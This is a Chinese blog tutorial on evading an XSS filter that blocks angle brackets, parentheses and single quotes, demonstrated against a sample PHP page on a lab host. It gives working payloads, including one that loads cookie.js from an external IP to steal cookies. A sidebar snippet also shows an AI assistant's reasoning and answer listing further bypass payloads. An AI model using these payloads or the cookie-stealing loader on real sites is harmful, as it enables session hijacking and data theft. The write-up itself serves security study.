【应用安全——XSS】过滤圆括号、尖括号绕过

最新推荐文章于 2025-10-19 22:41:12 发布

转载最新推荐文章于 2025-10-19 22:41:12 发布 · 4.7w 阅读

移动安全基础篇同时被 2 个专栏收录

43 篇文章

订阅专栏

移动安全高级篇

22 篇文章

订阅专栏

本文通过一个具体的PHP程序实例，详细解析了如何利用XSS（跨站脚本）攻击手段，绕过输入过滤，实现代码注入并最终获取目标网站的Cookie信息。文中展示了多种绕过技巧，包括使用URL编码的小括号、双引号替代单引号等。

先看下程序大概写法：

<?php
header("X-XSS-Protection:0");
$out = $_GET['code'];
$out = str_replace("<","&lt;",$out);
$out = str_replace(">","&gt;",$out);
$out = str_replace("("," ",$out);
$out = str_replace(")"," ",$out);
$out = str_replace("'"," ",$out);
echo "<html>
<body>
<input value=\"$out\">
</body>
</html>";
?>

首先编码了尖括号，那么无法闭合input标签，注意到这里是没有过滤双引号的。

http://192.168.192.120:8080/1.php?code=1" autofocus onfocus=alert(1) x="

输出源码如下：

<input value="1" autofocus onfocus=alert 1  x="">

因为过滤了小括号，无法弹窗，可以考虑用location中URL编码小括号绕过。

http://192.168.192.120:8080/1.php?code=1" autofocus onfocus=location='javasCript:alert%25281%2529' x="

但是这里过滤了单引号，我们改为双引号

http://192.168.192.120:8080/1.php?code=1" autofocus onfocus=location="javasCript:s=document.createElement%2528%2522script%2522%2529;s.src=%2522//120.92.84.50/myjs/cookie.js%2522;document.body.appendChild%2528s%2529;" x="

或者使用this.name传入，修改如下：

http://192.168.192.120:8080/1.php?code=1" name=javasCript:alert%25281%2529 autofocus onfocus=location=this.name x="

可以成功弹窗了，然后引入js，获取Cookie。

参考文章：
https://www.secpulse.com/archives/47696.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

FLy_鹏程万里

关注关注

5
点赞
踩
36

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

XSS过滤绕过总结_xss绕过字符过滤

计算机毕业论文源码，学生个人网页制作html源码。贴近用户做网络推广和互联网优化。

08-29

2074

XSS攻击通常指的是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript，但实际上也可以包括Java，VBScript，ActiveX，Flash或者甚至是普通的HTML。攻击成功后，攻击者可能得到更高的权限（如执行一些操作）、私密网页内容、会话和cookie等各种内容。...

xss绕过尖括号和双括号_xss防御及绕过-小记1

weixin_29315091的博客

12-23

3226

XSS搞安全的应该都很熟悉。本次并不是说其原理，仅是分享下在测试过程中遇到的案例。本人小白一枚，所以案例大佬们看着可能非常简单，就当是记录下自己笔记吧，不喜勿喷哈。。关于xss的防御，基本上都是采用输入过滤，输出编码。最近做的一个项目中的某个模块中，进行了输入过滤，采用跳转的形式。比如遇到<>或alert，响应包就会302跳转到固定网址。遇到这种黑名单的可以尝试各种绕过。有些输入是在i...

1 条评论您还未登录，请先登录后发表或查看评论

1 条评论

测试也是会开发的 2021.01.14
楼主的座右铭，莫非是校友[face]monkey2:002.png[/face]

XSS 攻击详解：原理、类型与防范策略

最新发布

技术分享

10-19

1672

XSS（跨站脚本攻击）是一种常见的网络安全漏洞，攻击者通过在受信任网站中注入恶意脚本，在用户浏览器中执行。主要分为存储型（脚本存储在服务器）、反射型（通过URL参数传播）和DOM型（完全在客户端执行）。XSS可导致会话劫持、数据窃取等严重后果。防范措施包括：输入验证与过滤、输出编码转义、内容安全策略（CSP）、设置HttpOnly/Secure Cookie等安全响应头，以及使用现代前端框架的自动转义功能。防御核心原则是"不信任任何用户输入"，需采用多层次防护策略。

xss绕过字符过滤_Xss小游戏通关秘籍

weixin_39758712的博客

12-01

660

原创： Kale 合天智汇原创投稿活动：https://link.zhihu.com/?target=https%3A//mp.weixin.qq.com/s/Nw2VDyvCpPt_GG5YKTQuUQ题记最近发现一个xss的攻防网站，界面很有意思，很适合寓教于乐。于是玩了一下午，特此记录下来！xss姿势众多，所以每关也只是给了一部分示例！知识前导什么是XSS？XSS 或者说跨站脚本是一种 We...

xss绕过尖括号和双括号_从Cookie中的Self-XSS到高危XSS

weixin_42290401的博客

12-16

456

上个月我到Synack的私有漏洞悬赏平台进行挖洞，发现在他们的一个网页中存在反射型XSS漏洞。由于Synack漏洞悬赏计划的私密性，我不会在这篇文章中提到测试目标，但是我将说明我是如何克服所遇到的许多不同的限制，最终挖到一个高危漏洞的。最初我的发现的XSS漏洞得到了272美元奖励，因为我无法证明我能访问文档对象模型，也就是DOM。而无法访问DOM的原因是括号字符被过滤，因此无法执行有效的paylo...

xss绕过尖括号和双括号_XSS过关wp（未完待续，目前13）

weixin_42309456的博客

12-16

913

1.LEVEL 1审计源码：注意这几行：<?php ini_set("display_errors", 0); $str = $_GET["name"]; echo "<h2 align=center>欢迎用户".$str."</h2>"; ?> GET方式传送一个参数name ，然后直接拼接echo所以给name直接传个最简单的xss弹窗即可：2.LEVEL...

xss绕过尖括号和双括号_看我如何 Bypass WAF 弹 XSS

weixin_32955455的博客

12-27

1886

点击蓝字关注我们声明本文作者：Keac本文字数：1600阅读时长：15分钟附件/链接：点击查看原文下载声明：请勿用作违法用途，否则后果自负本文属于WgpSec原创奖励计划，未经许可禁止转载前言Xss bypass waf 并且构造函数使危害更大,一般我们找到一个在js里面的可控点往往不能使危害更大，比如打开页面就执行一、开始正在干活，同事发来一条消息XSS？搞起随手试了下，发现网站存在...

第十二节 XSS 过滤器绕过-01

09-15

XSS 过滤器绕过技术详解 ...XSS 过滤器绕过技术需要攻击者具备深入的知识和经验，包括 Web 应用程序安全、XSS 攻击技术、自动化工具使用等。Web 开发者需要了解这些技术，来防止 XSS 攻击和保护用户信息。

xss绕过字符过滤_XSS过滤器绕过总结

weixin_39610353的博客

12-21

1353

XSS过滤器绕过总结黑名单过滤器绕过黑名单模式下的过滤器是最常见的。他们的目标是检测特定模式并防止恶意行为。这完全是“模式”的问题，它们越准确，就越可以拦截攻击。1. 注入脚本代码主要是标签，可用于执行客户端脚本代码，例如JavaScript。它是为此目的而设计的，当然，这是大多数过滤器阻止的第一个首选。1.1 绕过弱标签过滤简单的过滤器无法涵盖所有可能的情况，所以可以绕开它们。以下示例仅是对...

第十二节利用IE特性绕过XSS过滤-01

09-15

XSS 攻击和 IE 特性绕过 XSS 过滤 XSS（Cross-Site Scripting），即跨站脚本攻击，是一种常见的 Web 应用安全漏洞。攻击者可以通过在目标网站中Inject恶意脚本，劫持用户会话，盗取敏感信息，甚至控制用户的浏览器...

xss 绕过尖括号_XSS触发语句备忘

weixin_31205797的博客

01-18

976

一、标准语句二、尝试大小写三、使用标签1、windows事件//图片加载错误时触发2、鼠标事件//鼠标指针移动到元素时触发//鼠标指针移出时触发四、使用标签1、使用href属性qqtestaaaaaaa五、使用标签//用户按下按键时触发//用户按下按键时触发//用户松开按键时触发六、使用标签七、使用八、使用标签九、使用标签//加载时触发十、使用标签text//元素上点击鼠标时触发...

xss绕过尖括号和双括号_XSS绕过<>进行测试

weixin_42406749的博客

01-30

5655

大家都知道，普遍的防御XSS攻击的方法是在后台对以下字符进行转义：、’、”，但是经过本人的研究发现，在一些特殊场景下，即使对以上字符进行了转义，还是可以执行XSS攻击的。首先看一个JS的例子：Default1234vars="u003cu003e";alert(s);运行这段代码，结果显示如下：看到这么熟悉的尖括号，大家会不会有一些兴奋的感觉呢？JS代码中并没有出现尖括号，可是运行时却输出了尖括号...

xss尖括号等被转义情况下的绕过测试

热门推荐

z1moq的博客

07-25

1万+

打开靶场目标网站存在反射型xss漏洞，我们使用常用的方法进行测试发现并无作用，打开网站源码查看问题情况确实后端会将用户输入的数据无过滤直接返回前端，但是存在个别符号被转义的问题，导致无法正常弹窗通过查找资料可知，可以通过使用三重url编码的方式绕过这一问题尝试使用此方法进行绕过 emmmmmmm发现并不行尝试使用编码绕过发现也被转义了既然无法实现转义的绕过，就再次仔细观察前端页面代码发现在form表单中也会直接显示，并且发现 value 的值是由单引号闭合，且单引号在前几次测

xss绕过尖括号和双括号_XSS绕过filter高级技术part1

weixin_29903043的博客

12-23

1729

在如今的web时代，XSS攻击十分常见，针对xss攻击的防御也有不少，Filter就是一种用来防御xss攻击的最常见的手段，filter通常是采用黑名单的形式或者基于正则表达式来过滤。尽管如此，依然有很多技术可以用来绕过Filter。基本变形我们可以先从绕过相对简单的filter开始。根据Filter过滤规则复杂度的不同，绕过的难易程度肯定也不同，这些简单的过滤器还是比较容易绕过的，只要做一些基本...

xss绕过尖括号和双括号_强防御下的XSS绕过思路（一）白名单篇

weixin_39532754的博客

12-27

5807

前言很多白帽子在挖掘XSS漏洞的时候，往往会遇到一个问题，就是明明发现这里的过滤有缺陷，但是就是没法成功的进行构造利用。可能会由于自身对XSS绕过的局限性思维，往往只会反复的去尝试各种不同 payload代码，寄希望于其中某一个可以绕过过滤。但是在遇到强有力的XSS防御措施下，往往只能是竹篮打水一场空。鉴于这种情况，这里主要分3个章节来简单的分享一些XSS绕过思路。【第一节】白名单限...

绕过圆括号过滤实现XSS弹框

weixin_53498616的博客

03-01

557

用data协议 <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWHNzVGVzdCIpOzwvc2NyaXB0Pg=="></object> 转自：jinglingshu的博客 » 绕过括号过滤实现XSS弹框

xss绕过尖括号和双括号_xss挑战平台练习

weixin_33363704的博客

01-01

1361

-------------------------XSS挑战之旅-------------------------最近在学习xss，找到了一个xss练习平台，在线地址：http://test.xss.tv/实验环境也可以本地搭建，不过需要php+mysql的环境：xss通关小游戏：https://pan.baidu.com/s/1zS2GwTNbMBXEF2yNEBeLgA 密码：85g8我这...

XSS绕过

m0_59855041的博客

09-04

406

alert(1)

XSS绕过方式

OKAY_TC的博客

04-16

3181

记录挖洞过程中所遇到的XSS绕过 1. 过滤了<>尖括号： //原理：利用html以及js伪协议，当用户打开页面缓冲页面会自动获取焦点，从而触发js代码生成script标签，达到目的。 autofocus onfocus=location="javasCript:s=document.createElement("script");s.src="http://<ip>...

XSS尖括号绕过

07-17

<think>嗯，用户询问的是关于XSS攻击中绕过尖括号过滤的技术方法。这个问题涉及Web安全领域，需要深入理解XSS攻击原理和常见的防御绕过技巧。用户可能正在研究XSS漏洞的挖掘或防御，也可能是开发人员想了解如何防范这类攻击。从问题的专业性来看，用户应该有一定安全基础，但需要更具体的绕过技术细节。我注意到引用资料里提到了几种关键方法：使用Unicode转义序列(如u003c替代<)、利用JS编码特性、HTML实体编码、URL双重编码等。这些都很实用，但需要更系统地组织。在回答时，我会先解释为什么尖括号过滤重要(因为<和>是构造恶意标签的关键)，然后分三类说明绕过技术： 1. 字符替代方案：包括Unicode、HTML实体、URL编码等 2. 上下文利用：比如在JS字符串中直接执行代码而不依赖标签 3. 特殊符号技巧：用反引号、注释符等分割关键字符特别要注意引用[3]提到的字符编码细节，比如十进制(<)和十六进制(<)的区别，以及双写绕过的案例。用户提供的示例中location=this.location.hash.slice%601%60这个payload很有启发性，展示了如何用反引号代替括号。最后需要强调防御建议，避免回答被滥用。比如提到输入过滤要结合输出编码，以及内容安全策略(CSP)的重要性。</think>以下是XSS攻击中绕过尖括号过滤的技术方法及原理分析，结合引用资料进行说明： --- ### **一、尖括号过滤的绕过原理** 当防御系统过滤`<`和`>`时，攻击者可通过以下方式构造等效字符： 1. **Unicode 转义** 使用JS的Unicode表示：`\u003c` 代替 `<`，`\u003e` 代替 `>` ```javascript \u003cscript\u003ealert(1)\u003c/script\u003e // 等价于 <script>alert(1)</script> ``` *引用[1]中通过运行时输出尖括号验证了此方法的可行性* 2. **HTML 实体编码** 十进制/十六进制实体编码： ```html <img src=x onerror=alert(1)>  <img src=x onerror=alert(1)>  ``` --- ### **二、无尖括号的XSS构造技术** 当无法使用任何形式的尖括号时，可采用以下方法： 1. **事件处理器注入** 利用现有HTML标签的属性执行代码： ```html " onmouseover="alert(1)"  ' onfocus=alert(1) autofocus='  ``` 2. **JavaScript伪协议** 在URL上下文中直接执行JS： ```url javascript:alert(document.domain) ``` *引用[2]示例通过`location=this.location.hash.slice%601%60`实现代码分割执行* 3. **模板字符串绕过** 使用反引号代替括号调用函数： ```javascript alert`1` // 等效于 alert(1) ``` --- ### **三、高级绕过技巧** 1. **编码组合绕过** 双重URL编码 + JS解码： ```url %2522onload%253d%2522alert%25281%2529 // 前端解码后变为 "onload="alert(1) ``` 2. **注释符干扰检测** 插入非常规字符分割关键词： ```javascript <scr/*!@#$%*/ipt> // WAF可能无法识别被注释符分割的"script" ``` 3. **字符集与换行符利用** ```html <img src="a" onerror =alert(1)>  ``` --- ### **四、防御建议** 1. **输出编码** 根据上下文采用不同编码（HTML实体/JS编码/URL编码） 2. **CSP策略** 设置`Content-Security-Policy`限制脚本来源 3. **双重过滤** 同时过滤输入和输出端，避免单一依赖（*引用[3]强调双写和大小写绕过风险*） > **重要提示**：以上技术仅限安全研究，实际攻击属违法行为。防御需结合上下文感知的过滤规则，如检测`\u003c`、`javascript:`等关键模式。 ---